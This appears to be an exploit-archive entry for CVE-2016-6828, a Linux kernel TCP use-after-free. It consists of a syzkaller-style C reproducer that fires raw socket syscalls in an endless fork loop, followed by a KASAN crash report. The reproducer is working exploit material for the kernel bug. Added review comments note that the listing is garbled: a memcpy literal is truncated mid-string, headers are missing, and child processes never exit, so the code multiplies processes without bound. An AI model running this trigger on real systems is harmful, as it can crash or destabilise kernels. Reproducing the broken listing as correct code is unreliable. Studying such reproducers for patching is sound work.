Linux Kernel TCP Related Read Use-After-Free

Related Vulnerabilities: CVE-2016-6828  
Publish Date: 09 Nov 2016
Author: Marco Grassi
                							

                // Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html
 
// to build: clang derp4.c -o derp4 -static
 
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
 
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
 
long r[62];
 
 
/*
 * Entry point of a syzkaller-style reproducer for CVE-2016-6828.
 *
 * Loops forever: each iteration fork()s a child that replays a fixed sequence
 * of raw syscalls against an AF_INET6 stream socket (the literal arguments are
 * the fuzzer's encoded values and are left untouched here), while the parent
 * waitpid()s for it and prints a line. argc/argv are unused. Syscall results
 * are stored in the global r[] but never checked, as is usual for generated
 * reproducers. The KASAN report in the comment block further down is what
 * this sequence produced on v4.8-rc1.
 *
 * NOTE(review): waitpid() (<sys/wait.h>) and exit() (<stdlib.h>) are called
 * without their headers being included, so current compilers reject the
 * implicit declarations; and the memcpy() near the end of the child branch is
 * truncated in this listing (see the note there), so the file does not build
 * as shown.
 */
int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();
 
        if (pid == 0) {
        /* Child: the syscall sequence below runs once and then falls out of the
         * if/else. NOTE(review): the child never exits, so it returns to the top
         * of while(1) and fork()s again; every child therefore spawns children
         * of its own and the process count grows without bound. A reproducer
         * would normally _exit(0) after its last syscall. */
        /* Fixed anonymous RW mapping 0x20000000..0x20020000 (prot 0x3 =
         * PROT_READ|PROT_WRITE, flags 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS);
         * every 0x2000xxxx / 0x2001xxxx address used below lies inside it. */
        r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        /* socket(AF_INET6 = 0xa, SOCK_STREAM = 0x1, 0): an IPv6 TCP socket. */
        r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);
        /* 128-byte address blob; the leading 0a 00 is family = AF_INET6
         * (little-endian), so this presumably is a sockaddr_in6 padded to 0x80. */
        memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128);
        /* bind(r[1], 0x20006000, 0x80). */
        r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
        /* Second fixed mapping, 0x20020000..0x20021000, holding the sendto() address. */
        r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        /* 165 (0xa5) bytes of payload at 0x20012f5a, sent by the sendto() below. */
        memcpy((void*)0x20012f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 165);
        /* 28 (0x1c) byte destination address, again starting 0a 00 = AF_INET6. */
        memcpy((void*)0x20020000, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28);
        /* sendto(r[1], payload, 0xa5, flags, addr, 0x1c). The flags value is a
         * fuzzer-chosen 64-bit literal; the kernel takes flags as unsigned int,
         * so only the low 32 bits (0xfe149d8c) reach it. NOTE(review): which of
         * those bits are honoured by the socket layer is not determined here. */
        r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);
        /* setsockopt(r[1], SOL_SOCKET = 0x1, 0x8, &val, 4) with val = 2; optname 8
         * at SOL_SOCKET is SO_RCVBUF on Linux/x86-64. */
        *(uint32_t*)0x20001fff = (uint32_t)0x2;
        r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);
        /* dup(r[1]); all remaining socket calls go through the duplicate r[10]. */
        r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
        /* setsockopt(r[1], IPPROTO_IPV6 = 0x29, 0xb, &val, 4) with val = 4
         * (optname 0xb at IPPROTO_IPV6 looks like IPV6_FLOWINFO -- confirm). */
        *(uint32_t*)0x20018000 = (uint32_t)0x4;
        r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);
        /* Hand-built struct msghdr at 0x2000dfc8, field by field (x86-64 layout):
         *   msg_name = 0x2000e000, msg_namelen = 0xc, msg_iov = 0x20000000,
         *   msg_iovlen = 1, msg_control = NULL, msg_controllen = 0, msg_flags = 4. */
        *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;
        *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;
        *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;
        *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;
        *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;
        *(uint64_t*)0x2000dff0 = (uint64_t)0x0;
        *(uint32_t*)0x2000dff8 = (uint32_t)0x4;
        /* The 12-byte msg_name at 0x2000e000. */
        *(uint16_t*)0x2000e000 = (uint16_t)0x0;
        *(uint16_t*)0x2000e002 = (uint16_t)0x0;
        *(uint32_t*)0x2000e004 = (uint32_t)0xffff;
        *(uint32_t*)0x2000e008 = (uint32_t)0x401;
        /* The single iovec at 0x20000000: base 0x2000ed3a, len 0x37 (55 bytes). */
        *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;
        *(uint64_t*)0x20000008 = (uint64_t)0x37;
        /* The 55-byte iovec payload, written as unaligned scalars. NOTE(review):
         * (uint8_t)0x100 at 0x2000ed4b truncates to 0 and (uint32_t)0xffffffffffffffff
         * at 0x2000ed6a truncates to 0xffffffff; both are constant-conversion
         * warnings in the generated code, not deliberate values. */
        *(uint32_t*)0x2000ed3a = (uint32_t)0x14;
        *(uint16_t*)0x2000ed3e = (uint16_t)0x2;
        *(uint16_t*)0x2000ed40 = (uint16_t)0x12;
        *(uint32_t*)0x2000ed42 = (uint32_t)0x1f;
        *(uint32_t*)0x2000ed46 = (uint32_t)0x7;
        *(uint8_t*)0x2000ed4a = (uint8_t)0x6;
        *(uint8_t*)0x2000ed4b = (uint8_t)0x100;
        *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;
        *(uint32_t*)0x2000ed4d = (uint32_t)0x11;
        *(uint16_t*)0x2000ed51 = (uint16_t)0x0;
        *(uint16_t*)0x2000ed53 = (uint16_t)0x808;
        *(uint32_t*)0x2000ed55 = (uint32_t)0x1;
        *(uint32_t*)0x2000ed59 = (uint32_t)0x0;
        *(uint8_t*)0x2000ed5d = (uint8_t)0x0;
        *(uint32_t*)0x2000ed5e = (uint32_t)0x12;
        *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;
        *(uint16_t*)0x2000ed64 = (uint16_t)0x200;
        *(uint32_t*)0x2000ed66 = (uint32_t)0x5;
        *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;
        *(uint8_t*)0x2000ed6e = (uint8_t)0x9;
        *(uint8_t*)0x2000ed6f = (uint8_t)0x1;
        /* sendmsg(r[10], &msghdr, 0x801); 0x801 = MSG_OOB | MSG_CONFIRM on Linux. */
        r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);
        /* recvfrom(r[10], 0x20014a91, 0xde, 0, 0x20000ffb, 0x8). The last argument
         * is the literal 0x8 where a pointer to a socklen_t is expected (the
         * kernel writes the address length back through it), so the call is
         * expected to fail with EFAULT. The three stores just above land in the
         * 0x20000ffb address buffer. */
        *(uint16_t*)0x20001003 = (uint16_t)0x1;
        *(uint8_t*)0x20001005 = (uint8_t)0x0;
        *(uint32_t*)0x20001007 = (uint32_t)0x9;
        r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);
        /* NOTE(review): this memcpy() is garbled in the listing. The string
         * literal is split over three lines with backslash-newlines, which the
         * preprocessor splices into "\x9d" followed by the characters x d 9
         * (not the "\x9d\xd9" the original presumably had), and the closing
         * quote, length argument and ';' are missing. Consult the source URL at
         * the top of the file for the exact bytes; the sendto() right after it
         * sends 0x1000 bytes starting at 0x20015285. */
        memcpy((void*)0x20015285, "\xed\xe0\xf1\x03\xbd\x1d\xe2\x8d\x13\x62\xc9\x11\xde\x3b\x55\xb1\xb2\x26\x95\xb2\x3f\x32\x96\x8a\x3d\xf7\xd4\x2c\xd9\x32\xae\x05\x9a\x60\x09\xbc\x49\x63\x6a\x45\xd5\x6f\xa8\x4b\xaf\x8a\x66\xf3\x35\xad\xe6\x68\x85\xd4\x7e\xe5\x7c\x7e\x06\xbf\x32\xfb\xf9\xd2\x9f\x40\xa3\x0a\xa0\x93\x09\x73\x39\x7d\xac\x3c\x8d\x83\xe0\x0c\x5e\xa2\x36\x9b\x9c\xb4\x62\xe8\x39\x07\xd8\x71\xc1\x2f\x6f\x18\xfa\x8a\x5d\x06\xb4\x46\xa2\x97\x79\x81\xb2\x85\xd4\x4f\x6b\x48\xc4\xf5\xdd\xa8\x8d\x10\x74\x01\xe1\x58\xb2\x82\x72\xc4\xb6\xb2\xf7\xaa\x90\x9c\x9f\x61\x95\x87\x7b\x99\xc5\xa5\x53\xbc\xab\xdb\xdb\x5e\x32\xb8\xc3\xee\xd3\xda\x7a\xf2\x5c\xc5\x1a\xf1\xd6\x1b\x53\xad\x24\xd0\xa0\xc0\x0d\x73\x9e\x81\x7e\x4e\x82\xf5\xa9\x73\x3c\x7a\x5c\x6e\x4c\x48\x7d\x42\xf5\x2f\x68\xf9\x7e\xa9\xd8\x6a\x64\x78\x08\x7a\x37\xe9\xd3\x81\x15\x34\x63\x63\x14\xb7\x1a\x43\x9b\x4f\x85\xfa\x88\x5c\xe1\x1e\xce\x87\x95\xe1\x81\xc8\x06\xaf\x1a\x64\x26\x36\x83\x36\xef\x71\x0c\x2a\xda\xe4\xff\xa1\x87\xc2\x04\x96\x1c\x72\xd9\x2d\xf0\xce\x46\xd4\x3a\xd1\xc7\x2f\x60\x25\xf8\x33\x1f\x38\x7a\x46\xb1\x43\xa4\xd2\x65\x77\x47\x85\xe9\xad\x52\xdb\x8b\x93\x23\xf1\xf9\xa9\x5f\xe4\xf8\x39\x82\xc5\xb4\xe1\x5b\x87\xa0\xfd\x2c\xc2\x84\x15\x78\xaa\x9b\x3f\xe5\x75\x6e\x05\xef\x84\x4c\x6b\x9d\x1d\x9e\x7c\x92\x3b\x55\xcb\x01\x6f\xc5\x9a\xd8\xc3\x91\x39\x95\xd7\x8f\xe9\x87\x15\x27\xe7\x19\xa8\x18\x24\xfd\x09\x11\x49\x41\xc6\xd2\xe9\x1a\xf4\xb0\x9b\x85\x9b\x3f\xb1\xf3\xc3\x48\xc5\xe7\x45\x0b\x21\x2d\x32\x27\x92\x3c\x39\x52\x0f\x2b\xdf\x52\x66\x6f\x01\x8f\xdc\xfa\x8f\x5e\x53\xb7\x82\x23\x79\xfa\x28\xe5\x24\xa7\x5e\x2a\x24\x7e\xd0\x1e\xd5\x1a\xb6\xb8\xe5\xb2\x6d\x4d\x38\x61\x79\xb8\xd1\x27\x92\x63\x0c\xed\x3c\xf1\x13\x98\x37\xfa\x98\xda\x0c\x1a\x86\xd1\x6a\x12\x86\x2f\xd0\x8d\x8e\x2e\x52\x23\xac\x2d\x82\x59\xef\x17\xbc\xf1\x47\xfb\xf0\x5f\x43\x70\x99\x14\xdf\xaf\x44\x02\xb5\xe9\x39\x51\x8e\xf2\x07\x9c\xa2\x39\xab\x07\xa2\x22\xa7\xd3\x5c\xc0\x8c\xcf\x3c\xa2\xa7\xd0\xd6\xf4\x82\xcc\x35\x75\x3a\x20\xb7\x9b\xf3\x9d\
xd9\xfe\xdf\x1e\x3f\x55\xf2\x99\xdb\xd0\xb2\xd7\x86\xc1\xfa\xb3\xc7\x99\xdc\x02\xe3\x9f\xfd\x1e\x56\xc1\xf2\x51\x32\x84\x61\x30\x33\xf6\xe3\x82\x9f\xf2\x04\xaf\x5d\xf4\x3d\xa6\x0e\x25\x53\xe9\x05\x7c\x42\xbf\xfa\x97\xd7\x77\x8c\x8f\x29\x7a\xcb\x40\x13\x07\xb5\x8d\x69\xdc\x8b\x35\xd3\xb6\xf3\xd8\x07\x94\x7e\x69\x0f\xb7\x28\xf1\xb3\x45\x60\x37\x65\xa4\xf6\xbf\x9c\xb3\xf9\x3d\xe1\x08\x08\xc9\x76\x5e\x8b\x7f\x26\x01\x9d\x8f\x15\x39\x02\xfe\x8a\xe3\x3b\x8b\xf9\xae\x06\x04\xef\x0d\xcf\x67\x24\x54\xe6\x4c\xe4\x05\x8e\xd7\xda\x4c\xf2\xd7\x88\x75\x87\xf7\x7e\xd0\x49\x19\x02\x5e\x00\xc4\xeb\x3e\xec\x70\x35\x9c\x9b\xc9\xd9\x47\x65\x4c\xa3\xdb\x0e\xde\x1e\x76\x58\x27\xe0\x91\x6b\xf9\x25\x44\xa6\xa2\x85\x8f\x50\xd0\x13\x88\x57\x25\x56\x78\xed\xcb\x6b\xec\xf2\x4f\xd4\xce\xf1\x90\xcd\x49\x50\xb5\xcf\xd3\x96\x4d\x3c\xf4\x54\x8e\xa9\xdb\xd3\xb5\x9e\xe9\x87\x19\x8b\x59\xd7\xf2\xcf\x1a\xd3\x70\xca\x42\xc6\x97\x66\x38\x24\x39\x4d\x42\xa1\xf0\x24\x46\xe4\x0e\x9c\xbc\xc4\x53\xa9\xb9\x94\x4d\xca\x48\xa6\x04\xb8\x2f\x4f\xf5\x85\x32\x22\xf8\x4e\x83\xab\x34\x27\x3b\x8f\x24\x48\x15\x9b\xa9\xf8\xb9\xb7\xcb\xd5\xfb\x72\xec\x7a\xc3\x39\x9c\xde\x25\x76\x08\x3f\x49\x35\xbd\x42\x4f\x3f\x5e\xfc\x6b\x6b\x9e\x3e\x34\x47\x62\xed\x5a\xae\xdc\xcf\x4e\xe6\x18\xfa\x7f\xe6\x46\xc8\xbe\xbc\x42\x88\xb6\xfe\xbd\x96\x85\x5a\x4a\x1d\xd2\x00\xe9\x71\x48\x48\x52\xd6\xf5\x88\x7d\x94\x18\xf6\xf0\x5c\x0a\x39\x29\xc8\x78\xa0\xa8\x44\xf4\xb6\xca\x78\x75\x4a\xf7\x53\xd7\x7e\x23\xaf\x6b\xf9\xcd\x77\xb2\xd0\x37\x29\x9c\x57\xbe\x9e\x5f\x7c\xe4\x41\x59\xde\xd5\x63\x02\x2a\xc0\x74\xa6\x00\xe2\x8f\x83\x30\xc1\x60\xcd\xb3\xca\x44\x1d\x88\x54\x8b\xbc\xa8\x79\x78\x86\xa2\x49\x7c\x94\x49\xf3\xb4\x41\x44\x76\x33\xf1\x2e\x71\xbc\xa1\x39\xb9\x68\x56\xd9\xa0\xa1\x6f\xdc\x7d\xa3\xb8\x4f\x1c\xb8\x19\x26\x42\x88\x0e\xcb\xbb\xc9\x6c\xa8\xf8\xe9\x37\x86\x61\x37\x9f\xba\xb3\x9e\x54\x07\xe6\xff\x6f\x54\x8c\xcf\x7e\x3d\x14\xfd\x94\xbb\xdc\x59\x5d\x22\x86\xb5\x3b\x18\x0d\x08\xad\x15\x67\x6b\xf1\xc8\xd8\x81\xac\x14\x63\xcf\x1e\xf9\x48\xba\xe0\
x33\x4c\x1e\x72\xe9\x00\x1a\x48\xc5\xb4\x2c\x71\xd6\x7a\x0b\x8f\x6c\x02\x9a\x02\xa9\x20\xbd\x8a
        /* sendto(r[10], 0x20015285, 0x1000, 0xc080, NULL, 0); 0xc080 =
         * MSG_MORE | MSG_NOSIGNAL | MSG_EOR on Linux. */
        r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);
        /* Third fixed mapping 0x20022000..0x20023000, then a 0x28-byte record
         * built at its very end. NOTE(review): 0x20022fdd + 0x28 = 0x20023005,
         * so the write() below asks the kernel to read five bytes past the end
         * of the mapping; the KASAN report further down attributes both the skb
         * allocation and its free to tcp_sendmsg() reached from SyS_write, which
         * is consistent with the user copy faulting partway through this call. */
        r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        *(uint32_t*)0x20022fdd = (uint32_t)0x28;
        *(uint32_t*)0x20022fe1 = (uint32_t)0x400;
        *(uint64_t*)0x20022fe5 = (uint64_t)0x0;
        *(uint64_t*)0x20022fed = (uint64_t)0x8ab;
        *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;
        *(uint16_t*)0x20022ffd = (uint16_t)0x5;
        /* write(r[10], 0x20022fdd, 0x28). */
        r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);
        } else if (pid > 0) {
            /* Parent: reap the child before forking the next one
             * (waitpid() needs <sys/wait.h>; see the note on main). */
            int returnStatus;
            waitpid(pid, &returnStatus, 0);
            printf("collected child\n");
        } else {
            /* fork() failed: report and give up (exit() needs <stdlib.h>). */
            printf("fork failed\n");
            exit(1);
        }
    }
    return 0;
}
 
 
// KASAN report on v4.8-rc1; an equivalent report is produced on master
 
/*
[   21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428
[   21.447953] Read of size 4 by task rsyslogd/1612
[   21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G    B           4.8.0-rc1 #1
[   21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   21.450270]  0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151
[   21.451135]  ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400
[   21.452002]  ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400
[   21.452873] Call Trace:
[   21.453142]  <IRQ>  [<ffffffff81bef151>] dump_stack+0x83/0xb2
[   21.453835]  [<ffffffff815d0351>] kasan_object_err+0x21/0x70
[   21.454450]  [<ffffffff815d05f4>] kasan_report_error+0x204/0x500
[   21.455135]  [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70
[   21.455899]  [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.456624]  [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.457329]  [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120
[   21.458028]  [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0
[   21.458590]  [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0
[   21.459189]  [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0
[   21.459804]  [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0
[   21.460540]  [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20
[   21.461237]  [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0
[   21.461865]  [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210
[   21.462581]  [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0
[   21.463167]  [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0
[   21.463884]  [<ffffffff815cfaa5>] ? memcpy+0x45/0x50
[   21.464414]  [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0
[   21.465057]  [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240
[   21.465719]  [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0
[   21.466326]  [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0
[   21.466954]  [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120
[   21.467591]  [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410
[   21.468231]  [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0
[   21.468836]  [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550
[   21.469462]  [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0
[   21.470179]  [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0
[   21.470953]  [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50
[   21.471600]  [<ffffffff82b8396a>] ip6_input+0xda/0x1f0
[   21.472149]  [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90
[   21.472870]  [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50
[   21.473521]  [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0
[   21.474210]  [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0
[   21.474858]  [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340
[   21.475487]  [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750
[   21.476043]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.476615]  [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20
[   21.477332]  [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50
[   21.478956]  [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500
[   21.479618]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.480250]  [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0
[   21.481017]  [<ffffffff812092c0>] ? update_curr+0x150/0x4e0
[   21.481700]  [<ffffffff82937c90>] ? netdev_info+0x120/0x120
[   21.482339]  [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280
[   21.482969]  [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350
[   21.483619]  [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420
[   21.484295]  [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40
[   21.485101]  [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0
[   21.485739]  [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170
[   21.486383]  [<ffffffff8293e1a7>] process_backlog+0x197/0x580
[   21.487021]  [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0
[   21.487615]  [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0
[   21.488258]  [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20
[   21.488909]  [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110
[   21.489471]  [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30
[   21.490147]  [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340
[   21.490868]  [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d
[   21.491470]  [<ffffffff811769d7>] irq_exit+0x117/0x140
[   21.492035]  [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0
[   21.492712]  [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90
[   21.493378]  <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424
[   21.494277] Allocated:
[   21.494538] PID = 1711
[   21.494801]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.495416]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.495970]  [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0
[   21.496572]  [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20
[   21.497185]  [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0
[   21.497853]  [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0
[   21.498475]  [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790
[   21.499129]  [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10
[   21.499754]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.500371]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.500988]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.501625]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.502249]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.502838]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.503429]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.504144] Freed:
[   21.504368] PID = 1711
[   21.504628]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.505290]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.505879]  [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0
[   21.506501]  [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210
[   21.507128]  [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0
[   21.507752]  [<ffffffff828f3e22>] __kfree_skb+0x22/0x30
[   21.508339]  [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10
[   21.508962]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.509574]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.510194]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.510818]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.511408]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.512003]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.512562]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.513258] Memory state around the buggy address:
[   21.513770]  ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   21.514546]  ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc
[   21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.516114]                                   ^
[   21.516611]  ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.517400]  ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.518203] ==================================================================
*/

